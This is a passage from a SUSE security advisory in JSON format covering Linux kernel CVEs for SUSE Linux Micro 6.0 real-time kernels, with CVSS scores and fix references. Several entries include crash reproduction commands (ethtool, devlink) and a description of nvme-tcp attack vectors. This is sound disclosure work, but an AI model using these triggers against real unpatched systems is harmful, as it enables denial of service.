"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22998",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22998"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-tcp: fix NULL pointer dereferences in nvmet_tcp_build_pdu_iovec\n\nCommit efa56305908b (\"nvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU length\")\nadded ttag bounds checking and data_offset\nvalidation in nvmet_tcp_handle_h2c_data_pdu(), but it did not validate\nwhether the command\u0027s data structures (cmd-\u003ereq.sg and cmd-\u003eiov) have\nbeen properly initialized before processing H2C_DATA PDUs.\n\nThe nvmet_tcp_build_pdu_iovec() function dereferences these pointers\nwithout NULL checks. This can be triggered by sending H2C_DATA PDU\nimmediately after the ICREQ/ICRESP handshake, before\nsending a CONNECT command or NVMe write command.\n\nAttack vectors that trigger NULL pointer dereferences:\n1. H2C_DATA PDU sent before CONNECT -\u003e both pointers NULL\n2. H2C_DATA PDU for READ command -\u003e cmd-\u003ereq.sg allocated, cmd-\u003eiov NULL\n3. H2C_DATA PDU for uninitialized command slot -\u003e both pointers NULL\n\nThe fix validates both cmd-\u003ereq.sg and cmd-\u003eiov before calling\nnvmet_tcp_build_pdu_iovec(). Both checks are required because:\n- Uninitialized commands: both NULL\n- READ commands: cmd-\u003ereq.sg allocated, cmd-\u003eiov NULL\n- WRITE commands: both allocated",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22998",
"url": "https://www.suse.com/security/cve/CVE-2026-22998"
},
{
"category": "external",
"summary": "SUSE Bug 1257209 for CVE-2026-22998",
"url": "https://bugzilla.suse.com/1257209"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
